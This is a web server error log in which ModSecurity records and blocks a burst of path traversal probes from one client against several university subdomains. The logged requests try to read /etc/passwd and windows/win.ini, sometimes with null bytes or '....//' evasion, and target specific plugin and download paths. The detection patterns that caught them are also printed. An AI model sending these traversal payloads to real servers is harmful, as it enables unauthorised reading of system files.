[Tue Aug 29 11:44:49.425592 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAARphG8AAAAU"]
[Tue Aug 29 11:44:50.363065 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAfg73YAAAAe"]
[Tue Aug 29 11:44:50.389293 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAfkzDsAAAAi"]
[Tue Aug 29 11:44:50.406896 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAfEBzUAAAAO"]
[Tue Aug 29 11:44:50.462361 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wsCo-f0AAAc4E1QAAAAP"]
[Tue Aug 29 11:44:51.396809 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAfcoVQAAAAa"]
[Tue Aug 29 11:44:51.436139 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAc4E1kAAAAP"]
[Tue Aug 29 11:44:51.441305 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAhMtUMAAAAM"]
[Tue Aug 29 11:44:51.476717 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAc4E1oAAAAP"]
[Tue Aug 29 11:44:51.499571 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAARphHgAAAAU"]
[Tue Aug 29 11:44:52.395693 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13xMCo-f0AAAdQ3uMAAAAV"]
[Tue Aug 29 11:44:52.501393 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13xMCo-f0AAAhISPEAAAAH"]
[Tue Aug 29 11:44:53.400278 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAfZj9oAAAAN"]
[Tue Aug 29 11:44:53.409124 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAe3@HIAAAAA"]
[Tue Aug 29 11:44:53.410309 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAhISPQAAAAH"]
[Tue Aug 29 11:44:53.412353 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAARphH0AAAAU"]
[Tue Aug 29 11:44:53.479813 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAARphIAAAAAU"]
[Tue Aug 29 11:44:53.593622 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13xcCo-f0AAAfEB0EAAAAO"]
[Tue Aug 29 11:44:55.433059 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13x8Co-f0AAAe3@IUAAAAA"]
[Tue Aug 29 11:44:55.497624 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13x8Co-f0AAAfEB0oAAAAO"]
[Tue Aug 29 11:44:56.409609 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfZj@gAAAAN"]
[Tue Aug 29 11:44:56.418255 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAARphI0AAAAU"]
[Tue Aug 29 11:44:56.521606 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfbkuIAAAAZ"]
[Tue Aug 29 11:44:56.553457 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13yMCo-f0AAAfZj@wAAAAN"]
[Tue Aug 29 11:44:56.559898 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfbkuQAAAAZ"]
[Tue Aug 29 11:44:56.609908 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfSWhMAAAAB"]
[Tue Aug 29 11:44:57.423116 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ycCo-f0AAAfGagsAAAAT"]
[Tue Aug 29 11:44:57.511521 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13ycCo-f0AAAftVH0AAAAf"]
[Tue Aug 29 11:44:57.554641 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ycCo-f0AAAfSWhkAAAAB"]
[Tue Aug 29 11:44:57.603098 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ycCo-f0AAAhMtVcAAAAM"]
[Tue Aug 29 11:44:58.436237 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ysCo-f0AAAfZj-UAAAAN"]
[Tue Aug 29 11:44:58.682269 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ysCo-f0AAAdQ3w0AAAAV"]
[Tue Aug 29 11:44:58.968418 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ysCo-f0AAAhISRMAAAAH"]
[Tue Aug 29 11:44:58.988498 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ysCo-f0AAAhISRQAAAAH"]
[Tue Aug 29 11:44:59.396297 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13y8Co-f0AAAfSWh8AAAAB"]
[Tue Aug 29 11:44:59.436222 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13y8Co-f0AAAg@ABIAAAAQ"]
